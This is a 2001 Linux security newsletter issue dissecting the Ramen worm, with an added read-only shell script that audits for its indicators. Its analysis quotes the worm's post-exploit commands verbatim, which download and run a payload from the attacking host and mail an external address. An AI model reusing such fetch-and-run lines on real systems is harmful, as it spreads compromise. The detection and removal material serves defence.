LINUX SECURITY --- February 13, 2001
Published by ITworld.com -- changing the way you view IT
http://www.itworld.com/newsletters
________________________________________________________________________________
HIGHLIGHTS
* Dissecting the Ramen Worm.
________________________________________________________________________________
The Infamous Ramen Worm
By Rick Johnson
The Linux world has been buzzing recently about the Ramen Worm -- a
self-propagating worm that affects vulnerable versions of Red Hat 6 and
7. It attacks systems running vulnerable versions of wu-ftpd,
rpc.statd, and LPRng. Fixes for all three of these vulnerabilities,
however, have been available for months.
In addition to scanning for additional systems and propagating to
vulnerable ones, the worm also defaces Web servers it encounters by
replacing the "index.html" file with the following: "RameN Crew -
Hackers looooooooooooove noodles" and an image of a Top Ramen-brand
oriental noodle package.
Daniel Martin's (dtmartin24@home.com) full analysis of the worm is
available at http://members.home.net/dtmartin24/ramen_worm.txt. A
condensed version of his findings follows.
The worm begins with a modified form of synscan. This modified synscan
checks the target's FTP banner for the strings "Mon Feb 28" and "Wed Aug
9". If it finds the first string, it writes the hostname and/or IP
address of the scanned host to the file ".w"; if it finds the second, it
writes to the file ".l" (both in the current directory). Presumably,
this separation differentiates two breeds of exploitable machines --
Red Hat 6.2 and Red Hat 7.0.
Against ".w" file machines (i.e., Red Hat 6.2 machines), the attack
first runs a wu-ftpd exploit. Next, a copy of the widely available
statdx exploit for Red Hat 6.2 nfsd's runs against the target machine.
If either attack succeeds, the worm executes the following sequence of
commands:
mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
cp ramen.tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh
echo Eat Your Ramen! | mail -s TOADDR -c gb31337@hotmail.com gb31337@yahoo.com
Against Red Hat 7 machines (the ".l" file), the attack appears aimed at
the LPRng syslog format-string bug. A successful attack is followed by
the same shell commands executed against 6.2 machines. After executing
the shell commands, Ramen uses inetd on Red Hat 6.2 and xinetd on Red
Hat 7.0 to establish a minimal HTTP/0.9 server on port 27374 and begins
serving copies of itself. It determines its IP address and removes the
vulnerable services it used to spread itself -- rpc.statd on Red Hat 6.2
and lpd on Red Hat 7.0. In addition, the users "ftp" and "anonymous" are
added to /etc/ftpusers to close the wu-ftpd hole.
Luckily, Ramen does not try to hide itself. It can be detected on a
system by the presence of the /usr/src/.poop directory or the /sbin/asp
file. ISS (http://www.iss.net) recommends the following steps to remove
the Ramen Worm from a system:
1. Delete: /usr/src/.poop and /sbin/asp.
2. If it exists, remove: /etc/xinetd.d/asp
3. Remove all lines in /etc/rc.d/rc.sysinit which refer to any
file in /etc/src/.poop.
4. Remove any lines in /etc/inetd.conf referring to /sbin/asp
5. Reboot the system or manually kill any processes such as
synscan, start.sh, scan.sh, hackl.sh, or hackw.sh.
6. ISS recommends that ftp, rpc.statd, and lpr not be enabled
until updates have been installed.
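The following POSIX shell audit is an added example; it is not code from the newsletter, from ISS, or from William Stearns' script. It looks for the indicators named in the detection paragraph and in the ISS removal steps above (the /usr/src/.poop directory, /sbin/asp, the xinetd and inetd registrations, rc.sysinit references, and the worm's process names), reports and counts them, and removes nothing, so each item it flags can then be handled by the steps listed. The function names and the constructed test tree it audits at the end are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the newsletter or ISS): a read-only audit that
# reports the Ramen indicators described in the text. The optional ROOT
# prefix lets the same checks run against a constructed test tree instead
# of the live system; nothing is deleted or modified.

ramen_audit() {
    root="${1:-}"    # "" audits the live system; a path audits a tree under it
    count=0

    # The worm's working directory and its dropped HTTP/0.9 server binary.
    for f in "$root/usr/src/.poop" "$root/sbin/asp"; do
        if [ -e "$f" ]; then
            echo "FOUND: $f"
            count=$((count + 1))
        fi
    done

    # The server registered with xinetd (Red Hat 7.0) ...
    if [ -e "$root/etc/xinetd.d/asp" ]; then
        echo "FOUND: $root/etc/xinetd.d/asp"
        count=$((count + 1))
    fi
    # ... or with inetd (Red Hat 6.2).
    if [ -f "$root/etc/inetd.conf" ] && grep -q '/sbin/asp' "$root/etc/inetd.conf"; then
        echo "FOUND: /sbin/asp referenced in $root/etc/inetd.conf"
        count=$((count + 1))
    fi

    # Persistence: rc.sysinit lines that run anything out of the .poop directory.
    if [ -f "$root/etc/rc.d/rc.sysinit" ] && grep -q '/src/\.poop' "$root/etc/rc.d/rc.sysinit"; then
        echo "FOUND: .poop reference in $root/etc/rc.d/rc.sysinit:"
        grep -n '/src/\.poop' "$root/etc/rc.d/rc.sysinit" | sed 's/^/    /'
        count=$((count + 1))
    fi

    # Worm processes; only meaningful on the live system, so skipped for a test
    # tree. This is substring matching on the command line, so review hits by hand.
    if [ -z "$root" ]; then
        for p in synscan start.sh scan.sh hackl.sh hackw.sh; do
            if ps -eo args 2>/dev/null | grep -v grep | grep -Fq -- "$p"; then
                echo "FOUND: running process matching $p"
                count=$((count + 1))
            fi
        done
    fi

    echo "SUMMARY: $count Ramen indicator(s)"
    return 0
}

# Constructed test tree (no real infection): plants each file-based indicator
# under the given directory so the audit can be exercised safely.
ramen_plant_indicators() {
    t="$1"
    mkdir -p "$t/usr/src/.poop" "$t/sbin" "$t/etc/xinetd.d" "$t/etc/rc.d"
    : > "$t/sbin/asp"
    : > "$t/etc/xinetd.d/asp"
    printf 'asp stream tcp nowait root /sbin/asp\n' > "$t/etc/inetd.conf"
    printf '#!/bin/sh\n/usr/src/.poop/start.sh\n' > "$t/etc/rc.d/rc.sysinit"
}

# Demonstration against the constructed tree rather than the live system.
demo="$(mktemp -d)"
ramen_plant_indicators "$demo"
ramen_audit "$demo"       # five FOUND lines, then "SUMMARY: 5 Ramen indicator(s)"
rm -rf "$demo"
```

On a suspect host, run `ramen_audit` as root with no argument; to examine a disk mounted read-only elsewhere, pass its mount point so every path is checked under that prefix. The script deliberately does not flag "ftp" and "anonymous" in /etc/ftpusers, since a careful administrator sets those entries for legitimate reasons and they prove nothing on their own.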
William Stearns (wstearns@pobox.com) has also written a script to
detect the Ramen worm. It can be downloaded from:
http://www.sans.org/y2k/ramen.htm. Check it out.
About the author(s)
----------------
Rick Johnson is currently the Manager of Security Services for
FusionStorm, a remote managed services company. When not writing, he
heads the development team for PMFirewall, an Ipchains Firewall and
Masquerading Configuration Utility for Linux. Rick can be contacted via
email at rick@pointman.org or on the web at http://www.pointman.org.
________________________________________________________________________________
ADDITIONAL RESOURCES
Anna Kournikova virus hits US
Tennis star image touted in dangerous document
http://www.itworld.com/jump/linsec_nl/www.itworld.com/Net/3271/Itwnws020212anna_bug/
Stopping the Ramen worm
Linux and Unix administrators need to be more vigilant in their
security measures
http://www.linuxworld.com/jlw/linsec_nl/lw-2001-02/lw-02-ramenworm.html
Ramen Linux worm seen in wild
http://www.itworld.com/jump/linsec_nl/www.itworld.com/Comp/2366/ITW_1-25-01_Ramen
________________________________________________________________________________